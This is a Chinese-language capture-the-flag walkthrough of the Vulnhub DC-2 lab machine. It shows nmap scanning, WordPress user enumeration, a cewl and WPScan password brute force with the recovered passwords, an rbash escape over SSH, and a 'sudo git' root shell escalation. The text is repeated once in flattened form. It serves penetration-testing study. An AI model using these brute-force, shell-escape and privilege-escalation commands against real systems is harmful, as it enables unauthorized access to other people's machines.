vulnhub DC-2靶机实战
字数 1280 2025-08-12 11:34:39

DC-2 靶机渗透测试实战教程

0X00 靶机概述

DC-2 是 Vulnhub 上的一个渗透测试靶机,基于 WordPress 构建,包含多个 flag 和提权路径。本教程将详细记录从信息收集到最终提权的完整过程。

0X01 环境准备

  1. 下载靶机

    • 下载地址:https://www.vulnhub.com/entry/dc-2,311/
    • 下载后解压并用 VMware 或 VirtualBox 打开

  2. 网络配置

    • 建议使用 NAT 模式(避免桥接模式导致的 IP 混淆)
    • 确认攻击机和靶机在同一网段

0X02 信息收集

1. IP 地址发现

使用 nmap 扫描本地网络:

nmap -sP 192.168.23.0/24

发现靶机 IP 为 192.168.23.173

2. 端口扫描与服务识别

全面扫描靶机开放端口和服务:

nmap --script=vuln 192.168.23.173

初步发现:

  • 80 端口开放 HTTP 服务
  • 疑似 WordPress 系统

3. Web 服务分析

访问 http://192.168.23.173 发现重定向到 dc-2

解决方法
修改本地 hosts 文件:

192.168.23.173 dc-2

访问后确认是 WordPress 站点,并发现 flag1

提示:需要登录才能看到下一个 flag

0X03 用户枚举与密码爆破

1. 用户枚举

通过 WordPress 特性发现三个用户:

  • admin
  • tom
  • jerry

2. 密码字典生成

使用 cewl 生成基于网站内容的字典:

cewl http://dc-2 -w dict.txt

3. WPScan 爆破

使用 WPScan 进行密码爆破:

wpscan --url http://dc-2 -P dict.txt -U users.txt

爆破结果:

  • jerry: adipiscing
  • tom: parturient

0X04 获取 Flag

1. Flag2

使用 jerry 登录 WordPress 后台,发现 flag2

提示:这条路径无法继续,尝试其他方法

2. 全端口扫描

nmap -A -p 1-65535 192.168.23.173

发现 SSH 服务运行在 7744 端口

3. SSH 登录

尝试用 tom 用户登录:

ssh tom@192.168.23.173 -p 7744

密码:parturient

登录后发现 flag3

提示:tom 和 jerry 用户,以及 su 命令

4. Flag4

发现受限制的 shell (rbash),绕过方法:

ssh tom@192.168.23.173 -p 7744 -t "/bin/sh"

切换到 jerry 用户:

su jerry

密码:adipiscing

在 jerry 目录下找到 flag4

提示:git 提权

0X05 提权

1. 检查 sudo 权限

sudo -l

发现 jerry 可以以 root 权限运行 git

2. Git 提权

sudo git help config

在帮助界面底部输入:

!/bin/bash

获得 root shell

3. 获取最终 Flag

cd /root
cat final-flag.txt

0X06 总结

完整渗透路径:

  1. nmap 扫描发现 80 端口 WordPress
  2. 解决重定向问题获取 flag1
  3. WPScan 爆破获取用户凭据
  4. WordPress 后台获取 flag2
  5. 全端口扫描发现 7744 SSH
  6. SSH 登录获取 flag3
  7. 用户切换获取 flag4
  8. Git 提权获取 root 权限和最终 flag

关键点

  • 主机名重定向问题
  • WPScan 密码爆破
  • 非标准 SSH 端口
  • rbash 绕过
  • git sudo 提权
DC-2 靶机渗透测试实战教程 0X00 靶机概述 DC-2 是 Vulnhub 上的一个渗透测试靶机,基于 WordPress 构建,包含多个 flag 和提权路径。本教程将详细记录从信息收集到最终提权的完整过程。 0X01 环境准备 下载靶机 : 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后解压并用 VMware 或 VirtualBox 打开 网络配置 : 建议使用 NAT 模式(避免桥接模式导致的 IP 混淆) 确认攻击机和靶机在同一网段 0X02 信息收集 1. IP 地址发现 使用 nmap 扫描本地网络: 发现靶机 IP 为 192.168.23.173 2. 端口扫描与服务识别 全面扫描靶机开放端口和服务: 初步发现: 80 端口开放 HTTP 服务 疑似 WordPress 系统 3. Web 服务分析 访问 http://192.168.23.173 发现重定向到 dc-2 解决方法 : 修改本地 hosts 文件: 访问后确认是 WordPress 站点,并发现 flag1 : 提示:需要登录才能看到下一个 flag 0X03 用户枚举与密码爆破 1. 用户枚举 通过 WordPress 特性发现三个用户: admin tom jerry 2. 密码字典生成 使用 cewl 生成基于网站内容的字典: 3. WPScan 爆破 使用 WPScan 进行密码爆破: 爆破结果: jerry: adipiscing tom: parturient 0X04 获取 Flag 1. Flag2 使用 jerry 登录 WordPress 后台,发现 flag2 : 提示:这条路径无法继续,尝试其他方法 2. 全端口扫描 发现 SSH 服务运行在 7744 端口 3. SSH 登录 尝试用 tom 用户登录: 密码:parturient 登录后发现 flag3 : 提示:tom 和 jerry 用户,以及 su 命令 4. Flag4 发现受限制的 shell (rbash),绕过方法: 切换到 jerry 用户: 密码:adipiscing 在 jerry 目录下找到 flag4 : 提示:git 提权 0X05 提权 1. 检查 sudo 权限 发现 jerry 可以以 root 权限运行 git 2. Git 提权 在帮助界面底部输入: 获得 root shell 3. 获取最终 Flag 0X06 总结 完整渗透路径: nmap 扫描发现 80 端口 WordPress 解决重定向问题获取 flag1 WPScan 爆破获取用户凭据 WordPress 后台获取 flag2 全端口扫描发现 7744 SSH SSH 登录获取 flag3 用户切换获取 flag4 Git 提权获取 root 权限和最终 flag 关键点 : 主机名重定向问题 WPScan 密码爆破 非标准 SSH 端口 rbash 绕过 git sudo 提权